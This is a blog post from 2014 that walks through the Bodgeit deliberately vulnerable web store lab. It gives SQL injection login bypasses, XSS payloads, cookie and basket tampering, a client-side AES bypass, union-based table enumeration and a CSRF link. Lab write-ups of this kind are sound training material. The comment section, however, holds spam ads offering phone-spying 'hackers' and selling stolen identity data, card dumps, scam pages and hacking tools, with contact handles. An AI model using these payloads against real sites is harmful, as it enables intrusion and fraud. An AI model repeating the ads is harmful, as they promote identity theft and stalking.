2014年8月1日星期五

Bodgeit




View source code:
./js/util.js
<!-- td align="center" width="16%"><a href="admin.jsp">Admin</a></td-->

Website structure:
home.jsp
about.jsp
contact.jsp
admin.jsp
login.jsp
register.jsp
basket.jsp
search.jsp
advanced.jsp
product.jsp?typeid=1
product.jsp?prodid=1

Login as test@thebodgeitstore.com:
Login using SQL injection with test@thebodgeitstore.com' or '1'='1 as username and any password.

Login as user1@thebodgeitstore.com:
Login using SQL injection, any username and a' or '1'='1 as password.

Login as admin@thebodgeitstore.com:
Login using SQL injection with admin@thebodgeitstore.com' or '1'='1 as username and any password.

Find hidden content as a non admin user
View source code of home.jsp, find <!-- td align="center" width="16%"><a href="admin.jsp">Admin</a></td-->

Find diagnostic data:



Level 1: Display a popup using: <script>alert("XSS")</script>
Input 123<script>alert("XSS")</script> in the search input text field

Level 2: Display a popup using: <script>alert("XSS")</script>
Register a new user with username as a@a.com<script>alert("XSS")</script>

Access someone elses basket:
View any product and click "Add to Basket", then change the value of cookie "b_id" to someone else, such as 1.

Get the store to owe you money:
Login with registered user and buy something, tamper the submit data when click "Update Basket"           button, then change the quantity to negative, such as -10, submit the data.

Change your password via a GET request:
View source code in change password page, change the form method from post to get and then change your password.

Conquer AES encryption, and display a popup using: <script>alert("H@cked A3S")</script>
View source code in advanced.jsp,

<SCRIPT>
    loadfile('./js/encryption.js');
   
    var key = "31a3fce1-9908-4f";
   
    function validateForm(form){
        var query = document.getElementById('query');
        var q = document.getElementById('q');
        var val = encryptForm(key, form);
        if(val){
            q.value = val;
            query.submit();
        }  
        return false;
    }
   
    function encryptForm(key, form){
        var params = form_to_params(form).replace(/</g, '&lt;').replace(/>/g, '&gt;').replace(/"/g, '&quot;').replace(/'/g, '&#39');
        if(params.length > 0)
            return Aes.Ctr.encrypt(params, key, 128);
        return false;
    }  
</SCRIPT>

Change the "encryptForm" function to

    function encryptForm(key, form){
         var params = form_to_params(form);
        if(params.length > 0)
            return Aes.Ctr.encrypt(params, key, 128);
        return false;
    }   

Conquer AES encryption and append a list of table names to the normal results:
First to change the javascript in previous step(in order to see the detail information, add "?debug=true" to the URL), and try to inject following SQL:
xxxx' union select (select limit 0 1 table_name from information_schema.system_tables),2,3,4,5 from products -- 123

Got error message displayed:
DEBUG System error: java.sql.SQLException: ORDER BY with LIMIT required in statement [SELECT PRODUCT, DESC, TYPE, TYPEID, PRICE FROM PRODUCTS AS a JOIN PRODUCTTYPES AS b ON a.TYPEID = b.TYPEID WHERE PRODUCT LIKE '%xxxx' union select (select limit 0 1 table_name from information_schema.system_tables)]

So add "order by" statement:
xxxx' union select (select limit 0 1 table_name from information_schema.system_tables order by table_name),2,3,4,5 from products -- 123

We can get the table name!

And change "limit 0 1" to "limit 1 1", "limit 2 1" …
Finally we got this done.

Contact us page, input <script>alert("XSS")</script> and submit, only "alert(XSS)" displayed in the page, "<script>", "</script>" and double quotes are filtered, so change the input to <SCRIPT>alert('XSS')</SCRIPT> and resubmit. XSS happened.

Login with username and password as:  <script>alert("XSS")</script>/a' or '1'='1
XSS happened.

Advance search page in advance.jsp, view the source code and found: onsubmit="return validateForm(this);false;", delete this event, 500 error happen.

Submit "http://localhost:8080/bodgeit/password.jsp?password1=111111&password2=111111" in contact.jsp, if the admin view the feedback, CSRF will happen.
发帖者 时间:
标签:

5 条评论:

  1. Unknown2017年3月16日 14:41

    sazezae

    回复删除
  2. Unknown2017年3月17日 01:22

    Hi
    sorry for my english, thanks for your instruction about bodgeit, il helps me to train
    But one manipulation i haven't succeed
    the encrypt form, i don't know how to modify the script and re execute it. I use firefox, f12 and the inside tools of firefix I try to modify in it but it doesn't work. If you can help, i will be grateful

    回复删除
  3. 匿名2018年6月5日 17:57

    If you think your spouse may be cheating, you can contact PHONESPYAPPS1@GMAIL.COM
    He’s a real hacker and was very reliable in helping me spy on my cheating husband’s cell phone remotely.

    回复删除
  4. Cyber Zone2024年3月17日 19:59

    Hi Guys..

    Selling Legit & Verified Spammed Fullz
    Updated Fullz with guarantee results
    USA UK Canada All states Available
    Fresh Spammed & never sold

    Here I'm

    (at)killhacks | 752822040 I>C>Q
    (at)Leadsupplier | (at)killhacks TLGRM
    bigbull0334 (at) onion mail . org E.mail

    CC CVV's with billing address (USA|UK|CANADA)
    SSN DOB DL ADDRESS USA
    SIN DOB ADDRESS MMN CANADA
    NIN DOB ADDRESS SORT CODE UK
    HIGH CREDIT SCORE PROS 700+
    YOUNG AGE FULLZ 2002+
    BUSINESS EIN COMPANY FULLZ USA
    CLONING CARDS DUMPS WITH PIN TRACK 101 & 202
    SBA|PUA|UI|UBEREATS|DOORDASH PROFILES
    TAX RETURN FILLING PROS
    REAL DL|ID FRONG BACK WITH SELFIE USA|UK|CANADA
    REAL PASSPORT PHOTOS
    SPECIFIC INFO AVAILABLE IN BULK (AGE|GENDER|DOB|CITY|ZIP)
    OLD AGE & YOUNG AGE FULLZ AVAILABLE
    DEAD FULLZ
    GLOBAL REAL ID'S FRONT & BACK
    CARDING & LOAN METHODS
    SPAMMING TUTORIALS
    SCRIPTIING METHODS & TUTORIALS
    SCAM PAGES
    SMTP|RDP|C-PANEL|WEB-MAILER
    BULK SMS SENDER|EMAIL SENDER

    Quality stuff available
    Payment upfront (BTC|USDT|ETH|LTC)
    Many other stuff we can provide on demand

    回复删除
  5. Red Bull2025年3月29日 14:27

    FRESH FULLZ SSN DOB ADDRESS
    FRESH FULLZ SIN DOB ADDRESS
    FRESH FULLZ NIN DOB ADDRESS

    Available in bulk quantity with guaranteed info
    Invalid stuff will be replaced always
    You can get specific states, cities, zip codes & Gender as well

    Bulk Quantity fullz on low prices I'm offering
    You can try our stuff, samples can also be provided

    CONTACT DETAILS:
    ===================
    *What's App = (+1).. 727.. 788... 6129..
    *Tele Gr@m = @ killhacks / @ leadsupplier
    *TG Channel = t.me/leadsproviderworldwide
    *VK Messenger ID = @ leadsupplier
    *Email = hacksp007 at gmail dot com

    DL Fullz with ssn Dob address
    DL Fullz with Issue & Exp Dates
    DL fullz with MVR
    DL Real Photo front back with selfie
    Passport Photos with Selfie

    SSN DOB DL ADDRESS
    SSN DOB ADDRESS MMN
    SIN DOB ADDRESS MMN PHONE EMAIL
    NIN DOB DL ADDRESS MMN SORT CODE & ACCOUNT NUMBER

    Young Age fullz 2011-2023 Age
    Old Age Fullz 1960 below
    Dead Fullz in bulk quantity
    Fresh Sweep Stakes
    Crypto & Casino Leads
    High Credit Scores Pros Fullz 700+ Scores
    CC fullz with CVV & Billing Address
    Dumps with Pins 101 & 202 with Tutorial Guide

    Tools & Tutorials available as well
    SMTP
    RDP
    SHELL
    Web-Mailers
    SMS Bulk Senders
    Bulk EMail Senders
    C-panels
    H@cking & Sp@mming complete package with all tools & Tutorials included
    Sc@m pages & sc@m page scripting
    Kali Linux Complete course
    SMTP Linux Root

    & Many more stuff can provide you with guarantee & good connectivity
    Hurry up & grab the Fresh Stuff

    回复删除

订阅: 博文评论 (Atom)